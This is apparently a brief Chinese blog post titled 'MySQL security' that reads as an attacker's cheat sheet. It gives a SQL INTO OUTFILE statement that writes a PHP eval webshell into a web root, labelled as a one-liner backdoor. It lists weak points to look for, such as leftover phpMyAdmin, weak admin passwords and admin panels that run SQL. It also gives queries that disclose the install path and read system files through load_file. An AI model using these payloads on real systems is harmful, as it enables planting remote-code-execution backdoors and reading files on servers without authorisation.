mysql 安全

select '<?php @eval($_POST[1])?>' into outfile 'D:/APMServ5.2.6/www/htdocs/report/log.php'      //一句话

 

危险动作:

1、可直接上传php文件

2、phpmyadmin没有删除或弱口令

3、可在线编辑文件功能

4、爆目录

5、后台弱口令

6、后台可执行sql命令

 

 

select @@basedir as basePath from dual               //数据库安装路径

select load_file('C:/Windows/win.ini')        //查看指定路径下的文件

 

 

 

posted @ 2016-06-02 13:43  fleam  阅读(185)  评论(0编辑  收藏  举报